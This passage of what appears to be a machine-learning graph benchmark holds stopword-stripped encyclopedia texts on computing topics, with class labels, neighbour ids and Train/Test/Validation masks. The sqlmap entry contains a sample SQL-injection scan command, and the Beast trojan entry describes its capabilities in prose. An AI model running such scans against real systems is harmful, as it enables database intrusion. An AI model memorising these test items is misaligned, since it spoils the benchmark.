      1253,
      4841,
      6377,
      7403,
      5356,
      9964,
      10985,
      9455,
      3312,
      8944,
      242,
      2291,
      5363,
      9970,
      246,
      1273,
      3834,
      2811,
      3323,
      9466,
      1278,
      9468,
      9978,
      7938,
      10499,
      5380,
      5384,
      1804,
      8976,
      273,
      1298,
      787,
      788,
      789,
      1810,
      3857,
      1304,
      5397,
      8977,
      11539,
      3360,
      10016,
      8482,
      292,
      5413,
      8998,
      10235,
      2345,
      811,
      10236,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      10051,
      11075,
      11076,
      3911,
      4423,
      5452,
      6988,
      5454,
      5457,
      11601,
      7507,
      11604,
      7511,
      10590,
      3426,
      6502,
      8551,
      5484,
      7020,
      370,
      11635,
      5492,
      2933,
      11638,
      1399,
      376,
      6519,
      9335,
      7548,
      8573,
      7039,
      8063,
      10113,
      10627,
      8069,
      394,
      3978,
      4492,
      7053,
      7057,
      11667,
      4505,
      4506,
      11673,
      8092,
      11675,
      2462,
      5022,
      6049,
      421,
      1445,
      935,
      3493,
      3496,
      4521,
      9643,
      2477,
      4525,
      6062,
      9646,
      7601,
      8114,
      2995,
      10676,
      7607,
      10170,
      6075,
      6078,
      9151,
      9665,
      11204,
      11205,
      9671,
      4040,
      8136,
      5067,
      9166,
      463,
      11390,
      7134,
      6625,
      5093,
      5096,
      6632,
      4074,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      3573,
      5115,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11185,
    "label": 4,
    "text": "Weak_key:weak key cryptography weak key key used specific cipher makes cipher behave undesirable way weak keys usually represent small fraction overall keyspace usually means one generates random key encrypt message weak keys unlikely give rise security problem nevertheless considered desirable cipher weak keys cipher weak keys said flat linear key space virtually rotor-based cipher machines 1925 onwards implementation flaws lead substantial number weak keys created machines problems weak keys others modern block stream ciphers first stream cipher machines also rotor machines problems weak keys traditional rotor machines t52 one stream cipher machine weak key problems british first detected t52 traffic summer autumn 1942 one link sicily libya codenamed sturgeon another aegean sicily codenamed mackerel operators links habit enciphering several messages machine settings producing large numbers depths several mostly incompatible versions t52 t52a t52b differed electrical noise suppression t52c t52d t52e t52a/b t52c cryptologically weak last two advanced devices movement wheels intermittent decision whether advance controlled logic circuits took input data wheels addition number conceptual flaws including subtle ones eliminated one flaw ability reset keystream fixed point led key reuse undisciplined machine operators block cipher des specific keys termed weak keys semi-weak keys keys cause encryption mode des act identically decryption mode des albeit potentially different key operation secret 56-bit key broken 16 subkeys according des key schedule one subkey used sixteen des rounds des weak keys produce sixteen identical subkeys occurs key expressed hexadecimal implementation consider parity bits corresponding keys inverted parity bits may also work weak keys using weak keys outcome permuted choice 1 pc-1 des key schedule leads round keys either zeros ones alternating zero-one patterns since subkeys identical des feistel network encryption function self-inverting despite encrypting giving secure-looking cipher text encrypting twice produces original plaintext des also semi-weak keys produce two different subkeys used eight times algorithm means come pairs k k property e encryption algorithm encrypting message key k six semi-weak key pairs also 48 possibly weak keys produce four distinct subkeys instead 16 found nist publication weak semi-weak keys considered fatal flaws des 2 7.21 × 10 72 quadrillion possible keys des four weak twelve semi-weak tiny fraction possible keyspace users need worry desire check weak semi-weak keys keys generated easy recognize note however currently des longer recommended general use since des keys brute-forced decades since deep crack machine cracking order days computers tend recent solutions vastly cheaper time scale examples progress deep crack article goal 'flat keyspace i.e. keys equally strong always cipher design goal case des sometimes small number weak keys acceptable provided identified identifiable algorithm unknown weak keys inspire much trust two main countermeasures inadvertently using weak key large number weak keys serious flaw cipher design since perhaps large chance randomly generated one weak one compromising security messages encrypted also take longer check randomly generated keys weakness cases tempt shortcuts interest 'efficiency however weak keys much often problem adversary control keys used block cipher used mode operation intended construct secure cryptographic hash function e.g davies–meyer",
    "neighbors": [
      7556,
      262,
      2567,
      3084,
      2957,
      7056,
      2961,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      2357,
      10806,
      1847,
      9528,
      5433,
      2110,
      9156,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      10329,
      7643,
      9697,
      8674,
      229,
      4965,
      618,
      1898,
      11119,
      881,
      1654,
      7161,
      7034,
      892,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 11186,
    "label": 4,
    "text": "Jscrambler:jscrambler jscrambler technology company specializing client-side application security solutions web mobile applications javascript application shielding solution enables applications become self-defensive resilient tampering malware injection ip code theft reverse-engineering company also provides webpage monitoring solution enables real-time detection mitigation supply chain attacks dom tampering user interface changes customer hijacking jscrambler solutions used protect web mobile applications number sectors including finance broadcasting advertising media gaming jscrambler started auditmark back 2009 founded 2009 pedro fortuna rui ribeiro company initial focus developing solution fight click-fraud advertising campaigns since traffic audit mechanism javascript dependent name flagship product jscrambler also became name company 2014 jscrambler raised 800,000 seed funding portugal ventures public vc pe firm 2018 jscrambler raised us 2.3 million series round led sonae im co-investment portugal ventures jscrambler also recognized gartner ’ 2018 market guide application shielding 2019 market guide online fraud detection jscrambler products address specific client-side security concerns following dimensions jscrambler ’ products fully compliant main technological frameworks stacks including node.js react angular ionic",
    "neighbors": [
      803,
      3941,
      3462,
      10348,
      5404
    ],
    "mask": "None"
  },
  {
    "node_id": 11187,
    "label": 2,
    "text": "Record_Management_Services:record management services record management services rms procedures vms rsts/e rt-11 high-end rsx-11 operating systems programs may call process files records within files file formats procedures similar virtual storage access method vsam product offered ibm mainframe computers vendors file record management vms rms integral part system software procedures run executive mode rms integrated rt-11 rsts/e available layered product rms supports four record access methods rms supports four record formats",
    "neighbors": [
      2432,
      1253,
      8393,
      1804,
      7983,
      8402,
      6837,
      8312,
      7930,
      3323,
      10590
    ],
    "mask": "None"
  },
  {
    "node_id": 11188,
    "label": 4,
    "text": "Hardening_(computing):hardening computing computing hardening usually process securing system reducing surface vulnerability larger system performs functions principle single-function system secure multipurpose one reducing available ways attack typically includes changing default passwords removal unnecessary software unnecessary usernames logins disabling removal unnecessary services various methods hardening unix linux systems may involve among measures applying patch kernel exec shield pax closing open network ports setting intrusion-detection systems firewalls intrusion-prevention systems also hardening scripts tools like lynis bastille linux jass solaris systems apache/php hardener example deactivate unneeded features configuration files perform various protective measures binary hardening software security technique binary files analyzed modified protect common exploits binary hardening independent compilers involves entire toolchain example one binary hardening technique detect potential buffer overflows substitute safer code advantage manipulating binaries vulnerabilities legacy code fixed automatically without need source code may unavailable obfuscated secondly techniques applied binaries multiple compilers may less secure others binary hardening often involves non-deterministic modification control flow instruction addresses prevent attackers successfully reusing program code perform exploits common hardening techniques",
    "neighbors": [
      8066,
      7812,
      4119,
      1304,
      8094,
      2975,
      9646,
      823,
      1208,
      5176,
      5435,
      3643,
      11198,
      9791,
      10433,
      8644,
      5065,
      11081,
      6092,
      6606,
      719,
      1111,
      10344,
      10732,
      11502,
      7920,
      4081,
      5492,
      5245,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11189,
    "label": 8,
    "text": "Embedded_HTTP_server:embedded http server embedded http server component software system implements http protocol examples usage within application might advantages using http perform natural limitations platforms embedded http server runs contribute list non-functional requirements embedded precise embeddable http server requirements every specific project requirements vary significantly example rom ram footprints serious constraint limit choices system designer c++ jvm availability system another constraint frequently performance issue typical embedded systems run multiple simultaneous tasks http server one may configured low priority task",
    "neighbors": [
      225,
      9762,
      10020,
      8998,
      9580,
      2287,
      2383,
      7983,
      9360,
      1747,
      2456,
      4797,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11190,
    "label": 7,
    "text": "Coda.io:coda.io coda cloud-based document editor founded shishir mehrotra alex deneui software provides word-processing spreadsheet database functions 2017 coda reported raised 60 million capital",
    "neighbors": [
      5202
    ],
    "mask": "Test"
  },
  {
    "node_id": 11191,
    "label": 4,
    "text": "Sqlmap:sqlmap sqlmap open source software used detect exploit database vulnerabilities provides options injecting malicious codes penetration testing tool automates process detecting exploiting sql injection flaws providing user interface terminal software run command line available download different operating systems linux distributions windows mac os operating systems addition mapping detecting vulnerabilities software enables access database editing deleting data viewing data tables users passwords backups phone numbers e-mail addresses credit cards confidential sensitive information sqlmap full support multiple dbmss including mysql oracle postgresql microsoft sql server microsoft access ibm db2 sqlite firebird sap maxdb full support injection techniques boolean error stack time union standard use software unix environment follows sqlmap -u http //172.16.0.0/files/file.php id=1 additional values combined help file prompted command sqlmap -h",
    "neighbors": [
      899,
      7523,
      10340,
      5546,
      9389,
      7022,
      3473,
      7989,
      11030,
      823,
      11221,
      8539,
      4445
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11192,
    "label": 5,
    "text": "Wireless_Internet_Protocol:wireless internet protocol wireless internet protocols suite wireless protocols wireless application protocol 2.0 wap includes xhtml basic nokia xhtml mobile profile future developments wap open mobile alliance wireless internet protocols able deliver xhtml pages appropriate wireless devices without need http wap proxies using wireless internet protocols web pages rendered differently web browsers handhelds without need two different versions page",
    "neighbors": [
      5875
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11193,
    "label": 6,
    "text": "Direct_Access_File_System:direct access file system direct access file system dafs network file system based nfsv4 virtual interface vi data transfer mechanism dafs uses remote direct memory access rdma perform efficient network access data remote files lowers latency reducing number steps needed process transfer remote data file locking cached client side eliminating need access file server subsequent data access dafs initially developed network appliance inc. 85-member industry association named dafs collaborative assembled complete specification draft release v1.0 passed internet engineering task force ietf version 1.0 dafs application programming interface completed 2001 year working version dafs demonstrated using oracle database dafs beta version 1.0 available sourceforge bsd license last updated 2004",
    "neighbors": [
      9320,
      11193,
      2322,
      3820
    ],
    "mask": "None"
  },
  {
    "node_id": 11194,
    "label": 3,
    "text": "Daedalian_Opus:daedalian opus game essentially series 36 jigsaw puzzles pentominos must assembled specific shape puzzles start rectangular shapes simple solutions puzzles quickly grow complex odder shapes like rocket ship gun even enlarged versions pentominoes level timed timer started stopped level finished one starts game three pentomino pieces completion early level new piece awarded player final level player given 2x2 square tetromino must complete 8x8 square puzzle completing level player given password access level later time password common english four-letter word guessing common four-letter words players could potentially access levels actually reached playing game name game inspired daedalus mythical character greek legend created labyrinth faithful fan version later coded msx computer system karoshi corporation 2006 game development contest msxdev'06 game ported different platforms pc gp2x",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11195,
    "label": 4,
    "text": "Shawn_Carpenter:shawn carpenter shawn carpenter american navy veteran whistleblower previously employed sandia national laboratories tracked chinese cyberespionage ring code-named titan rain fbi came national attention story reported september 5 2005 issue time magazine carpenter employee sandia national laboratories investigating security breaches networks however upon tracking several breaches sandia lockheed martin corporation redstone arsenal even nasa dating back 2003 carpenter noticed patterns began appear link attacks single group impressed meticulous voracious incredibly fast manner sometimes completed less 30 minutes hackers operated observations led alert federal government findings titan rain hacking operation first reported august 25 2005 washington post article bradley graham n't mention carpenter graham listed anonymous governmental officials sources informing supervisors breaches told concern sandia computers drop issue employment later terminated carpenter disobeyed management communicated information security breaches first united states army cyber counterintelligence special agents verified information later brought fbi fbi requested senior dac counterintelligence agent known counterintelligence community nickname doc handle carpenter lead operation behalf fbi carpenter confidential informant fbi almost half year sandia discovered actions carpenter reportedly felt betrayed termination viewed actions service country similar previous military service according carpenter termination hearing sandia bruce held sandia chief counterintelligence yelled 're lucky understanding management ... worked would decapitate would least blood office subsequent court case held testified use word decapitate recall using word blood would contest also apologized carpenter sued sandia national laboratories wrongful termination defamation jury awarded almost 4.7 million compensatory punitive damages february 13 2007 jury doubled punitive damages requested carpenter attorneys thad guyer stephani ayers philip davis 13-person new mexico state district court jury determined sandia handling shawn carpenter termination malicious willful reckless wanton fraudulent bad faith juror ed dzienis said sandia interest protecting us certainly n't show way handled shawn ms. alex scott jury forewoman said jurors upset lack documentation process reckless behavior part sandia adequate policies place employees hacking cavalier attitude national security global security carpenter wife dr. jennifer jacobs testified trial dr. jacobs former sandia scientist nuclear engineer west point graduate army reserve major said sandia management questioned loyalty company husband fired dr. jacobs left sandia later appointed white house fellow director united states national security council interview albuquerque journal dr. jacobs stated point us along bad country contractors like sandia corporation behaving way -- impunity citizens n't beginning end country kept coming back expect others sandia corporation private entity manages sandia national laboratories behalf national nuclear security administration department energy federal government united states wholly owned subsidiary for-profit lockheed martin corporation ironic twist carpenter testified trial found hundreds pages detailed schematics sensitive documents labeled lockheed martin proprietary information export controlled regarding mars reconnaissance orbiter stashed foreign server south korea helping fbi investigate stolen lockheed martin information along hundreds network breaches military united states defense contractors sandia officials fired carpenter employed netwitness corporation startup headed amit yoran former director national cyber security division within united states department homeland security march 2007 sandia national laboratories retained three additional attorneys international corporate defense firm baker botts post-trial motions sandia attorneys unsuccessfully argued throw jury verdict reduce judgment zero new trial carpenter attorneys successfully argued motion post-judgment interest sandia ordered pay interest rate 15 per year final judgment 4,742,146.66 plus attorney fees appeals process april 2007 sandia attorneys filed motion appeal jury verdict sandia national laboratories posted 5.8 million supersedeas bond prevent carpenter seizing sandia assets appeals process interest amount almost 60,000 month accumulates sandia pursues appeals according news reports sandia plans appeal new mexico supreme court necessary could take years october 14 2007 albuquerque journal published story analyst sandia settle suit stated sandia dropped appeal verdict according story judgment accumulating 15 percent interest since verdict favor february 2007 piece also related carpenter continues work national security area clients intelligence community federal agencies military",
    "neighbors": [
      184,
      9688,
      5087
    ],
    "mask": "Test"
  },
  {
    "node_id": 11196,
    "label": 2,
    "text": "ZOC_(software):zoc software zoc popular computer-based terminal emulator telnet software client microsoft windows apple macintosh macos operating systems supports telnet modem ssh 1 2 isdn serial tapi rlogin means communication terminal emulator supports xterm emulation full colors meta-keys local printing vt102 vt220 several types ansi well wyse tvi tn3270 sun cde supports full keyboard remapping scripting rexx languages support named pipes zoc commercial software developed markus schmidt emtec innovative software germany firm produces software various aspects communications via telephone pc isdn like price us 80 free evaluation period 30 days zoc downloaded evaluation emtec several shareware distribution sites emtec produce two associated independent telecommunications programmes use tcp/ip modem isdn etc pyrotrans ftp package including client server pyrobatchftp programmable ftp tool zoc first released os/2 october 1993 v0.95 windows november 1996 v3.02 1997 selected runner-up os/2 e-zine readers choice awards zoc released version 3.11 january 1999 support os/2 discontinued release version 5 mac os x supported version 6",
    "neighbors": [
      1121,
      7364,
      10341,
      11112,
      6797,
      4590,
      7983,
      10833,
      9780,
      9813,
      8504,
      10428
    ],
    "mask": "Test"
  },
  {
    "node_id": 11197,
    "label": 4,
    "text": "Beast_(Trojan_horse):beast trojan horse beast windows-based backdoor trojan horse commonly known hacking community remote administration tool rat capable infecting versions windows 95 10 written delphi released first author tataye 2002 became quite popular due unique features used typical client–server model client would operation attacker server would infect victim beast one first trojans feature reverse connection victims established gave attacker complete control infected computer virus would harmless opened opened virus would use code injection method inject applications machine running windows xp removal three files safe mode system restore turned would disinfect system default ports used direct reverse connections 6666 9999 respectively though attacker option changing beast came built-in firewall bypasser ability terminating anti-virus firewall processes also came file binder could used join two files together one executable",
    "neighbors": [
      8386,
      11266,
      10756,
      8998,
      4956,
      4490,
      107,
      6797,
      2222,
      7983,
      5500
    ],
    "mask": "Test"
  },
  {
    "node_id": 11198,
    "label": 4,
    "text": "Cyber_self-defense:cyber self-defense cybersecurity cyber self-defense refers self-defense cyberattack generally emphasizes active cybersecurity measures computer users sometimes used refer self-defense organizations whole corporate entities entire nations surveillance self-defense variant cyber self-defense largely overlaps active passive cybersecurity measures provide defenders higher levels cybersecurity intrusion detection incident handling remediation capabilities various sectors organizations legally obligated adhere cyber security standards organizations may conduct penetration test via internal team hire third-party organization audit organization systems larger organizations may conduct internal attacker-defender scenarios red team attacking blue team defending defenders namely threat hunters system administrators programmers proactively manage information systems remediate vulnerabilities gather cyber threat intelligence harden operating systems code connected devices networks blue teams may include information physical security personnel employed organization physical security may tested weaknesses employees may target social engineering attacks security audits digital physical systems may audited varying degrees knowledge relevant systems simulate realistic conditions attackers employees frequently trained security practices measures full-knowledge test scenarios known white box tests attacking party knows available information regarding client systems black box tests attacking party provided information regarding client systems gray box tests provide limited information attacking party cybersecurity researcher jeffrey carr compares cyber self-defense martial art one computer network attack surface may shrunk reduce risk exploitation legal theorists policy makers increasingly considering authorizing private sector take active measures hacking-back also known hackbacks contrast active attack measures passive defense measures present reduced risk cyberwarfare legal political economic fallout contemporary topic debate research question 'when cyber-attack threat thereof give rise right self-defense march 2017 tom graves proposed active cyber defense certainty act acdc would enhance computer fraud abuse act cfaa allow individuals private sector use certain tools currently restricted cfaa identify attackers prevent attacks hacking presents chicken egg problem wherein everyone allowed hack anyone everyone would hack everyone skilled resourced would remain brad maryman warns unintended consequences stating view notion legislate accept level undocumented unmonitored cyber actions anyone thinks hacked unfathomable",
    "neighbors": [
      5636,
      3717,
      7556,
      8580,
      8329,
      6797,
      4494,
      1169,
      3473,
      3858,
      1557,
      5373,
      5531,
      3742,
      8094,
      9375,
      2213,
      3366,
      8998,
      939,
      10539,
      3629,
      7983,
      1918,
      11188,
      7222,
      823,
      5433,
      700,
      4797,
      7228,
      8637,
      11198,
      2128,
      4689,
      1111,
      6360,
      9688,
      11225,
      8283,
      5472,
      1251,
      3941,
      10213,
      231,
      5608,
      1899,
      11244,
      5492,
      4725,
      5749,
      5245,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11199,
    "label": 1,
    "text": "Pakistan_MNP_Database:pakistan mnp database pakistan mnp database guarantee limited subsidiary four cellular mobile operators pakistan maintains country central number portability clearing house pakistan mobile number portability database guarantee limited pmd incorporated 2005 companies ordinance 1984 launch mnp pakistan pursuant ‘ mobile number portability regulations 2005 ’ s.r.o 763 2005 pakistan first country south asia implement mobile number portability telenor first operator pakistan secure 1 million subscribers mnp",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11200,
    "label": 3,
    "text": "Red_Pitaya_(hardware):red pitaya hardware red pitaya open-source hardware project intended alternative many expensive laboratory measurement control instruments core selling point inclusion 2x 125ms/s rf input 2x 125ms/s rf outputs 50 mhz analogue bandwidth 14 bit analog-to-digital digital-to-analog converters software includes oscilloscope spectrum analyzer signal generator lcr meter lcr add costs additional 400 euros 50 mhz 2x2 mimo pid controller re-programmed become devices io ports connected common field-programmable gate array fpga also auxiliary adc 250ks/s digital io three usb 2.0 ports wifi ethernet connector internally uses linux operating system mass storage device operating system micro-sd card due wide bandwidth adc dac red pitaya used software defined radio receiver transmitter radio frequency applications hamlab fully featured sdr hf tranceiver output power 10 w based red pitaya board expected released amateur radio market october 2016 although software including hdl source code project made freely available device fully open source hardware project device electrical schematics made openly available",
    "neighbors": [
      7745,
      823,
      3886,
      7983,
      1776,
      3159,
      1849
    ],
    "mask": "Test"
  },
  {
    "node_id": 11201,
    "label": 6,
    "text": "Amazon_S3:amazon s3 amazon s3 amazon simple storage service service offered amazon web services aws provides object storage web service interface amazon s3 uses scalable storage infrastructure amazon.com uses run global e-commerce network amazon s3 employed store type object allows uses like storage internet applications backup recovery disaster recovery data archives data lakes analytics hybrid cloud storage service-level agreement amazon s3 guarantees 99.9 monthly uptime works less 43 minutes downtime per month aws launched amazon s3 united states march 14 2006 europe november 2007 although amazon web services aws publicly provide details s3 technical design amazon s3 manages data object storage architecture aims provide scalability high availability low latency 99.999999999 durability 99.95 99.99 availability though service-level agreement durability basic storage units amazon s3 objects organized buckets object identified unique user-assigned key buckets managed using either console provided amazon s3 programmatically using aws sdk amazon s3 rest application programming interface api objects managed using aws sdk amazon s3 rest api five terabytes size two kilobytes metadata additionally objects downloaded using http get interface bittorrent protocol requests authorized using access control list associated object bucket support versioning disabled default note since buckets typically size entire file system mount systems access control scheme coarse-grained i.e unique access controls associated individual files bucket names keys chosen objects addressable using http urls amazon s3 used replace significant existing static web-hosting infrastructure http client accessible objects amazon aws authentication mechanism allows bucket owner create authenticated url valid specified amount time every item bucket also served bittorrent feed amazon s3 store act seed host torrent bittorrent client retrieve file drastically reduce bandwidth cost download popular objects use bittorrent reduce bandwidth aws provide native bandwidth limiting users access automated cost control lead users free-tier amazon s3 small hobby users amassing dramatic bills aws representatives stated bandwidth limiting feature design table 2006 2010 2011 feature longer development bucket configured save http log information sibling bucket used data mining operations various user mode file system fuse -based file systems unix-like operating systems linux etc used mount s3 bucket file system s3ql semantics amazon s3 file system posix file system file system may behave entirely expected amazon s3 provides option host static html websites index document support error document support support added result user requests dating least 2006 example suppose amazon s3 configured cname records host codice_5 past visitor url would find xml-formatted list objects instead general landing page e.g. index.html accommodate casual visitors however websites hosted s3 may designate default page display another page display event partially invalid url 404 error amazon s3 allows users enable disable logging enabled logs stored amazon s3 buckets analyzed logs contain useful information logs analyzed managed using third-party tools like s3stat cloudlytics qloudstat awstats splunk amazon s3 provides api developers aws console provides tools managing uploading files capable managing large buckets editing files third-party websites like s3edit.com software like cloudberry explorer forklift webdrive capability edit files amazon s3 amazon s3 offers four different storage classes offer different levels durability availability performance requirements broad adoption amazon s3 related tooling given rise competing services based s3 api services use standard programming interface however differentiated underlying technologies supporting business models cloud storage standard like electrical networking standards enables competing service providers design services clients using different parts different ways yet still communicate provide following benefits examples competing amazon s3-compliant storage implementations amazon web services introduced amazons3 2006 amazon s3 reported store 2 trillion objects 10 billion objects october 2007 14 billion objects january 2008 29 billion objects october 2008 52 billion objects march 2009 64 billion objects august 2009 102 billion objects march 2010",
    "neighbors": [
      4623,
      19,
      1047,
      10265,
      5660,
      9762,
      9766,
      5159,
      3121,
      590,
      7248,
      4194,
      5732,
      10340,
      5737,
      8810,
      9844,
      7802,
      2170,
      4224,
      6281,
      4236,
      10893,
      11410,
      5791,
      10912,
      6307,
      5797,
      11429,
      2217,
      9906,
      7352,
      4797,
      4289,
      7364,
      1222,
      1224,
      10447,
      3794,
      7381,
      728,
      3800,
      8921,
      11482,
      735,
      6367,
      3819,
      8941,
      7415,
      253,
      8446,
      3328,
      8962,
      8451,
      8465,
      2328,
      4377,
      8986,
      11038,
      6943,
      10020,
      11556,
      6444,
      8495,
      11065,
      11581,
      3909,
      5960,
      8520,
      4429,
      1362,
      7512,
      4954,
      2395,
      5470,
      3428,
      10088,
      362,
      5482,
      10090,
      7022,
      11633,
      7546,
      5499,
      11646,
      2944,
      5504,
      6027,
      1421,
      911,
      1935,
      8592,
      405,
      2965,
      922,
      11178,
      2487,
      9144,
      10681,
      2496,
      10185,
      5066,
      5070,
      9682,
      467,
      4574,
      479,
      5599,
      3042,
      7138,
      1001,
      7660,
      8181,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11202,
    "label": 4,
    "text": "ZMap_(software):zmap software zmap free open-source security scanner developed faster alternative nmap zmap designed information security research used white hat black hat purposes tool able discover vulnerabilities impact detect affected iot devices using one gigabit per second network bandwidth zmap scan entire ipv4 address space hour single port zmap iterates techniques utilized predecessor nmap altering scanning method key areas nmap sends individual signals ip address waits reply replies return nmap compiles database keep track responses process slows scanning process contrast zmap uses cyclic multiplicative groups allows zmap scan space roughly 1,300 times faster nmap zmap software takes every number 1 2-1 creates iterative formula ensures possible 32-bit numbers visited pseudorandom order building initial list numbers every ip address takes upfront time fraction required aggregate list every sent received probe process ensures zmap starts sending probes different ips accidental denial service could occur abundance transmissions would converge one subnet time zmap also speeds scanning process sending probe every ip address default whereas nmap resends probe detects connection delay fails get reply results 2 ip addresses missed typical scan processing billions ip address potential iot devices targeted cyberattackers 2 acceptable tolerance zmap used vulnerability detection exploitation application used port 443 scans estimate power outages hurricane sandy 2013 one developers zmap zakir durumeric used software determine computer online state vulnerabilities operating system services zmap also used detect vulnerabilities universal plug play devices search weak public keys https website logs",
    "neighbors": [
      8386,
      8674,
      2084,
      5598,
      5636,
      5612,
      7983,
      1232,
      3473,
      4689,
      2739,
      3539,
      5373,
      5469,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11203,
    "label": 1,
    "text": "EXtremeDB:extremedb extremedb high performance low-latency acid-compliant embedded database management system using in-memory database system imds architecture designed linked c/c++ based programs works windows linux real-time embedded operating systems building core imds several editions supporting high availability database clustering hybrid in-memory disk-based data storage columnar layout time series data financial market data specialized abilities mcobject introduced extremedb 2001 targeting embedded systems running resource-constrained environments i.e limited random-access memory relatively low-powered central processing units extremedb characteristics appealing market include small code size approximately 150 kb native c language application programming interface available source code high degree portability support varied processors operating systems used embedded systems early deployments customers included integration digital tv set-top boxes manufacturing industrial control systems telecom/networking devices extremedb emerged manage industry analysts mcobject portray significant growth amount data managed devices company claims extremedb first embedded database management system dbms developed specifically environments later editions targeted high performance non-embedded software market including capital markets applications algorithmic trading order matching engines real-time caching web-based applications including social networks e-commerce features added support focus include sql odbc jdbc interfaces 64-bit support multiversion concurrency control mvcc transaction management increasingly popular term “ internet things ” especially since 2009 encompasses real-time embedded systems extremedb supports following features across product family extremedb supports multiple concurrent users offering acid-compliant transactions defined jim gray using either two transaction managers multiple-reader single writer mursiw locking mechanism multiversion concurrency control mvcc transaction manager optimistic non-locking model extremedb work virtually c language data types including complex types including structures arrays vectors blobs unicode supported extremedb high availability edition supports synchronous 2-safe asynchronous 1-safe database replication automatic failover extremedb cluster edition provides shared-nothing database clustering extremedb also supports distributed query processing database partitioned horizontally dbms distributes query processing across multiple servers cpus and/or cpu cores extremedb supports heterogeneous client platforms e.g mix windows linux rtoss clustering high availability features single partitioned database include shards running mix hardware os platforms extremedb fusion edition provides option persistent storage disk flash specific tables via database schema notation extremedb transaction logging edition keeps record changes made database uses log provide recovery event device system failure edition includes extremedb data relay technology replicates selected changes external systems enterprise applications database systems extremesql edition provides sql odbc support extremedb version 4 level 4 jdbc driver extremedb kernel mode edition deploys database system within operating system kernel provide database functions kernel-based applications logic extremedb financial edition provides features managing market data tick data applications algorithmic trading order matching “ sequences ” data type supports columnar data layout enables extremedb offer benefits column-oriented database handling time series data financial edition also provides library vector-based statistical functions analyze data sequences performance monitor mcobject published reports benchmark tests employing extremedb main-memory vs. ram-disk databases linux-based benchmark examined imds performance versus traditional on-disk dbms deployed ram disk identical application tasks benchmark ’ stated goal test thesis imds streamlined architecture delivers performance benefit beyond provided memory-based storage another benchmark terabyte-plus in-memory database system imds benchmark documented imds scalability performance size range large enterprise application versus embedded systems databases test engineers created 1.17 terabyte 15.54 billion row database extremedb 160-core sgi altix 4700 system running suse linux enterprise server 9 november 2012 marketing report published dell servers mellanox infiniband late 2014 two additional audited benchmark reports focused extremedb financial edition october 29 report assessed mcobject ’ dbms ibm power8 hardware november 18 report documented use cloud computing 2016. another report measured extremedb financial edition",
    "neighbors": [
      3,
      6797,
      3219,
      9366,
      10921,
      4781,
      10286,
      7983,
      10413,
      823,
      5178,
      10048,
      3784,
      2383,
      4817,
      7767,
      4572,
      4194,
      8554,
      5612,
      1776,
      3573,
      1400,
      3450,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11204,
    "label": 2,
    "text": "Minerva_(QDOS_reimplementation):minerva qdos reimplementation written laurence reeves england minerva reimplementation sinclair qdos built-in operating system sinclair ql line personal computers minerva incorporated many bug fixes enhancements qdos superbasic programming language later versions also provided ability multi-task several instances superbasic interpreter something supported qdos minerva distributed rom chip daughterboard replaced ql original rom chips minerva mk ii daughterboard also produced also incorporated i²c interface non-volatile real-time clock version 1.89 minerva source code licensed gnu general public license reimplementations qdos include sms2 smsq/e",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      10666,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      8642,
      11075,
      8388,
      8262,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11205,
    "label": 2,
    "text": "Livermore_Time_Sharing_System:livermore time sharing system livermore time sharing system ltss supercomputer operating system originally developed lawrence livermore laboratories control data corporation 6600 7600 series supercomputers ltss resulted cray time sharing system network livermore timesharing system nltss",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      9151,
      576,
      11075,
      8388,
      4423,
      1480,
      7497,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      11517,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      2811,
      3197,
      1150,
      2303
    ],
    "mask": "Test"
  },
  {
    "node_id": 11206,
    "label": 0,
    "text": "Semantic_similarity:semantic similarity semantic similarity metric defined set documents terms idea distance based likeness meaning semantic content opposed similarity estimated regarding syntactical representation e.g string format mathematical tools used estimate strength semantic relationship units language concepts instances numerical description obtained according comparison information supporting meaning describing nature term semantic similarity often confused semantic relatedness semantic relatedness includes relation two terms semantic similarity includes relations example car similar bus also related road driving computationally semantic similarity estimated defining topological similarity using ontologies define distance terms/concepts example naive metric comparison concepts ordered partially ordered set represented nodes directed acyclic graph e.g. taxonomy would shortest-path linking two concept nodes based text analyses semantic relatedness units language e.g. words sentences also estimated using statistical means vector space model correlate words textual contexts suitable text corpus concept semantic similarity specific semantic relatedness latter includes concepts antonymy meronymy similarity however much literature uses terms interchangeably along terms like semantic distance essence semantic similarity semantic distance semantic relatedness mean much term term b answer question usually number -1 1 0 1 1 signifies extremely high 